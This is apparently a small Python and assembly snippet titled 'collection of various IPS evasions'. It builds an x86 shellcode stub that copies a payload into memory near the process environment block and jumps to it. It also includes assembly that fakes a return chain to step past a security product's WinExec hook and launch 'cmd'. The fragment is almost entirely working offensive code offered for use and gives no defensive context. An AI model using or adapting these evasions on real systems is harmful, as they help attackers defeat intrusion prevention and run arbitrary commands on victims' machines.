collection of various IPS evasions

evasions.py

offset = 0x1000 - len(scode) - 32
tls_header  = "\xE8\x00\x00\x00\x00"                 # CALL $+5
tls_header += "\x5E"                                 # POP ESI
tls_header += "\x83\xC6\x1B"                         # ADD ESI, 0x1b 
tls_header += "\xB9" + struct.pack("<L", len(scode)) # MOV ECX, len(scode)
tls_header += "\x64\x8B\x3D\x30\x00\x00\x00"         # MOV EDI,DWORD PTR FS:[30]
tls_header += "\x81\xC7" + struct.pack("<L", offset) # ADD EDI, offset
tls_header += "\x57"                                 # PUSH EDI
tls_header += "\xFC"                                 # CLD
tls_header += "\xF3\xA4"                             # REP MOVSB [EDI], [ESI]
tls_header += "\xC3"                                 # RETN

"""
another:
	pop ebx						; Real return address
	push 0x00220000				; Address of push ebp/call ebp after a call.
	push ebx					; Final return to the real return address
	push 0xbadc0de2				; Junk to align stack for pop ebp
	push [ebp+0x4]				; Pointer to 'cmd\0'
	push 0x1010303D				; Address of pop ebp/ret(after a call) in CSAUSER

	push ebp					; WinExec preable
	mov ebp, esp
	sub esp, 0x54				; end WinExec preable
	jmp eax						; jmp past WinExec hook. (eax = &WinExec + 0x6)
"""